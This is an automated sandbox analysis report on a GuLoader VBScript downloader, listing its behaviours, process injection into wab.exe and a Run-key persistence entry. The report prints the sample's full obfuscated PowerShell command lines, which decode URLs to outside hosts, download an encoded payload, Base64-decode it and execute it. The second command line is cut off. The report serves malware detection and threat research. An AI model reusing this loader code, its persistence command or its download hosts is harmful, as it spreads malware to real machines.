Malware Analysis Report

2024-10-18 23:08

Sample ID 240709-xka1ws1ekc
Target b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs
SHA256 b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79
Tags
guloader downloader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79

Threat Level: Known bad

The file b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Modifies registry key

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-09 18:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-09 18:54

Reported

2024-07-09 18:56

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Algoritmiskes = "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\\Coindication\\').Fyrsvamp;%Paginerende% ($elektronspillets)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3592 set thread context of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4692 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4660 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4648 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1228 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1088 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 4556 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2804 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2104 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1700 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1556 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 1680 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3292 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2260 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3340 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2436 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 2696 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 set thread context of 3932 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Program Files (x86)\windows mail\wab.exe

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1300 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 3824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 4756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3824 wrote to memory of 4756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3824 wrote to memory of 3592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4972 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3592 wrote to memory of 4100 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 1624 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1624 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2904 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3272 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 400 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4264 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 5116 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 1352 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2844 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 4252 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 3348 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2428 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4100 wrote to memory of 2008 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. ';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u 